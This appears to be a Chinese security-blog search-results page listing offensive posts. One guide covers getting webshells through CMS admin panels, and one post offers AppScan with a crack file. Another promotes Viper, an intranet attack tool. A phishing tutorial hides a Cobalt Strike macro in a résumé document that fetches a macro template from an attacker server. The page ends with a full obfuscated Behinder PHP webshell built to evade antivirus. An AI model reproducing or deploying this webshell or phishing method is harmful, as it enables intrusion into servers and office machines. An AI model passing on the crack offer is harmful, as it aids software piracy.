找到
20
篇与
网络安全
相关的结果
- 第 2 页
-
渗透技巧 | 网站后台常见的Getshell技术整理 get也叫做拿webshell,通过注入或者其他途径,获取网站管理员账号和密码后,找到后台登录地址,登录后,寻找后台漏洞上传网页后门,获取网站的webshell。 webshell的作用是方便攻击者,webshell是拥有fso权限,根据fso权限的不用,可以对网页进行编辑,删除,上传或者下载,查看文件。渗透人员也可以通过这个webshell对服务器进行提权,提权成功后,会得到服务器管理权限。 一.WordPress的Getshell WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。 也可以把 WordPress当作一个内容管理系统(CMS)来使用。 1.更改模板处 复现: 第一步:找到外观->编辑->编辑模板。 l56e85vf.png图片 第二步:验证 l56e8hxo.png图片 2.上传主题 复现: 第一步:在上传主题处,上传一个主题压缩包,主题中需要含有木马代码。 ps:上传成功后,压缩包会自动解压。 l56e8t15.png图片 上传了一个qiesi的压缩包,成功后木马被自动解压出来 l56eav11.png图片 第二步:验证 l56edddr.png图片 二.DedeCMS的Getshell 1.任意文件上传 dede是织梦内容管理系统dedecms的简称,是一个PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。 复现: 第一步:在文件上传处,直接上传木马即可 l56edz9l.png图片 第二步:验证 l56ee5p3.png图片 2.模板配置 复现: 第一步:在模板—>默认模板管理—>修改index.htm模版内容 l56eeg4i.png图片 第二步:在生成—>更新主页的HTML中,将htm改成php后更新。 l56eengu.png图片 第三步:验证 l56euweg.png图片 3.广告内容 复现: 第一步:在 模板—>广告管理—>新增广告处 l56ez4xk.png图片 第二步:验证 l56f1mr5.png图片 l56f1sz4.png图片 三.南方数据CMS 南方数据企业网站管理系统V18官方主站、企业网站SQL版、好的企业网站管理系统、企业建站系统、南方数据企业CMS、企业网站SEO、网站优化、SEO搜索引擎优化机制、自助建站系统、前台全站采用静态html页面模板自动生成。 是由国内知名的CMS及电子商务管理软件开发商科创网络工作室**自主研发的新一代企业电子商务系统产品、同时提供各种网页模板、企业网站模板、免费企业网站系统、自动建站系统、全能型企业网站系统。 1.00截断 复现: 第一步:在 新闻咨询 -> 添加新闻 -> 上传处 l56f29o2.png图片 第二步:上传,使用00截断 l56f2frk.png图片 第三步:验证 l56f2muc.png图片 2.网站配置 复现: 第一步:在系统管理->常量设置处,插入代码 l56f30tk.png图片 第二步:验证 l56f3alq.png图片 四.pageadmin CMS PageAdmin CMS系统是基于.Net的网站管理系统,安全、稳定、灵活,全国用户超过百万,致力于为企业、学校、政府网站建设和网站制作提供企业级内容管理系统解决方案。 1.自解压 getshell 复现: 第一步:在文件管理处,选择模板上传,然后上传一个压缩包,其中压缩包里面包含木马。 l56f4hni.png图片 第二步:验证:成功。 l56f4mhq.png图片 2.利用配置文件,连接数据库,进行getshell 复现: 第一步:查看配置文件 l56f4t75.png图片 第二步:连接数据库 l56f4xji.png图片 第三步:验证,可以利用数据库进行命令执行。 l56f53kk.png图片 声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权! -
漏洞扫描 -- Appscan Standard 10.0.7(附crack文件) 软件界面 l16mrw1y.png图片 一、简介 HCLAppScan Standard 是 HCL AppScan 应用程序安全测试套件的渗透测试组件,用于测试 Web 应用程序和服务。它具有识别安全漏洞的前沿方法和技术,可帮助保护应用程序免受网络攻击的威胁。 二、新增功能 1、新的用户体验和改善的用户体验: 启动扫描的新主页 屏幕左侧的导航栏使您可以快速访问工作流程中的主步骤 仪表板将基本扫描数据收集在一起,在扫描运行时实时更新 “问题”和“任务”视图合并为新的“问题”视图 自适应用户界面设计 重新设计的扫描日志。 “重新设计的选项”对话框(工具 > 选项) 选择您的工作首选项,浅色模式或新的深色模式 2、操作系统支持:Windows Server 2022(Enterprise 和 Pro)和 Windows 11 3、支持 TLS 1.3(仅适用于两个新的操作系统) 4、MFA:支持 TOTP 和 URL 生成的 OTP(请参阅配置 OTP) 5、将安全问题导出为 CSV 格式(请参阅导出为 CSV) 6、新行业标准报告: “CWE/SANS 最危险的 25 个错误”已替换为“CWE 2021 年最危险的 25 个软件弱点” “OWASP TOP 10 - 2021” -
Viper(炫彩蛇)是一款图形化内网渗透工具 l0zexisy.png图片 产品简介: 19be6b ed4014 FFFF00{timeline-item color="#FF3EF"} Viper(炫彩蛇)目标是帮助红队工程师提高攻击效率,简化操作,降低技术门槛. {/timeline-item}9999FF Viper(炫彩蛇)是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. l0zf63zk.png图片 Viper(炫彩蛇)集成杀软绕过,内网隧道,文件管理,命令行等基础功能. l0zfant3.png图片 l0zfawkn.png图片 l0zfb8yh.png图片 l0zfbf7r.png图片 Viper(炫彩蛇)当前已集成70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类. l0zfbk3x.png图片 可视化的内网网络拓扑展示 l0zfc4up.png图片 l0zfc8da.png图片 Viper(炫彩蛇)目标是帮助红队工程师提高攻击效率,简化操作,降低技术门槛. l0zfd06j.png图片 l0zfd3vh.png图片 项目github地址: github 项目官网地址: 官网 -
渗透钓鱼篇-Word文档注入执行恶意宏 0x01 前言 网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段! 网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码、信用卡还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。 网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是,如果他们要保护自己的信息,所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。 图片 这篇主要演示如何创建Word文档进行钓鱼,并控制对方,该方法也是红队常用的钓鱼方式之一,利用的是分离免杀!最后还会写一点思路! 0x02 环境介绍 黑客(攻击者): IP:192.168.1.9 系统:kali.2020.4 VPS服务器: 目前演示是用kali来架设做VPS公网服务器的!道理意义一样! 办公电脑: 系统:windwos10 IP:192.168.1.208 640.png图片 目前kali上运行了Cobalt strike ,攻击者在自己的公网VPS服务器上制作了后门word文档,并上传上去作为钓鱼用,办公电脑收到对方邮件或者各种手段发送的word后门文档,最终黑客控制办公电脑的过程!! 0x03 Word文档注入后门宏演示 1、创建基础文档 在桌面基础创建文档名称:dayu.docx 图片 2、开发工具 大部分办公都不需要开发环境工具,所以在word文档栏目中是没有开发工具这项栏目的,需要在这里打开即可!! 图片 图片 3、CS创建office后门 这里CS在前面已经讲得很详细了,不懂的往前看看文章!Attacks-MS office Macro进入! 图片 选择监听!点击Generate! 图片 生成宏后门,点击复制! 图片 4、插入后门代码 点击开发工具后,双击打开ThisDocument后出现编辑框!将刚复制好的CS后门代码复制进入! 图片 右上角选择Auto_Open,简单理解就是自动打开的意思!就是对方在打开word文档时,簿会自动运行宏提示信息,是否点击,点击就抓取到了shell!! 图片 Ctrl+S保存后,会提示,点击否即可! 图片 选择保存类型:*.dotm…(为什么选择dotm,往下看就晓得了~) 图片 保存后提示报毒了!!未做任何免杀的!!继续… 图片 目前桌面上有两个文件,一个宏,一个docx…(为了讲得更细致步骤就细化了) 图片 5、简单测试 这里简单测试,是测试CS生成的shell和本机是互联的,确保能拿到对方控制权限! 右键点打开!(必须右键点打开!) 图片 提示宏已禁用,点击启用内容! 图片 正常上线!说明没问题,那么接下来继续!! 图片 6、上传后门宏 将后门宏文件dayu.dotm上传到公网服务器中(这里用kali进行模拟) 图片 7、新建word文档 目前文档类型非常多,我已简历为主!这里创建一个简历模版保存到桌面即可! 图片 8、修改文件名 修改文件名:docx改为zip类型!! 图片 9、修改宏内容 将zip文件解压,进入/word/_rels目录下,打开settings.xml.rels宏文件,这段就是宏需要执行的代码…! file:///C:\Users\yujun\AppData\Roaming\Microsoft\Templates\精美简历,由%20MOO%20设计.dotx 图片 将该段代码修改为以下内容,意思就是执行开启宏后,会执行访问下载服务器上的dotm宏文件并执行!! http://192.168.1.9:8001/dayu.dotm 图片 然后将内容重新压缩后,在修改zip为docx类型,修改后可看到就是我的简历了! 图片 这里利用的是分离免杀的方法,里面的代码都是正常的,由于杀毒软件是静态查杀,所以无法查杀的! 10、下载并执行 可看到通过下载该简历文件,微软、360、火绒都是不查杀的! 图片 出于好奇心,打开文档,提示: 该工程中的宏被禁止,请...........是否激活... 那么安全意识强的肯定是点X,安全意识差的,点确定,都没关系!钓鱼嘛,主要钓鱼安全意识差,又不懂安全的人,社会太多太多了~~所以要加强安全意识啊! 这里点击确定或者关闭点X关掉该框框,都意义不大,主要的意思是提醒用户,左上角可以启用内容!!!使用宏!!!正常浏览简历!!! 那么左上角还有个安全警告,点击启用内容!! 11、成功控制 可看到成功获得办公电脑192.168.1.208的控制权限!! 图片 图片 0x04 另外思路 如果是遇到WPS的客户怎么办?通过上面的方法WPS打开我的简历是不会提示宏的!我这只提供思路,因为现在群体用WPS非常的多,就不会写出来了! 另外思路: 打开WPS创建宏是暗色的需要安装VBA for WPS才可以写WPS宏病毒代码执行! Office和WPS中还可以隐藏文字,可以利用该方式通过配合录制宏的方法,用该方式执行… Normal模块下,不止能编写一个settings.xml.rels…可以多宏… 弹框执行代码写入宏,那么Excel、PPT等也写… 不止docx宏,还有很多,能另存文件内容的都可以… 还有前面也提了混淆,就到这里,不在往下说了…提高安全意识吧~~ 今天基础牢固就到这里,虽然基础,但是必须牢记于心。 -
冰蝎php免杀bypass <?php @error_reporting(0); session_start(); $t='{{{{{{{{{{{{{'^chr(25).chr(26).chr(8).chr(30).chr(77).chr(79).chr(36).chr(31).chr(30).chr(24).chr(20).chr(31).chr(30); $f='file'.'_get'.'_contents'; $p='{{{{{{{{{{{'^chr(11).chr(19).chr(11).chr(65).chr(84).chr(84).chr(18).chr(21).chr(11).chr(14).chr(15); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION['k']=$key; $post=$f($p); if(!extension_loaded('openssl')) { $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $key = $key[$i+1&15]; $post[$i] = $port[$i]^$key; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function b($p) {eval($p."");}} @call_user_func(array(C,b),$params); ?> <?php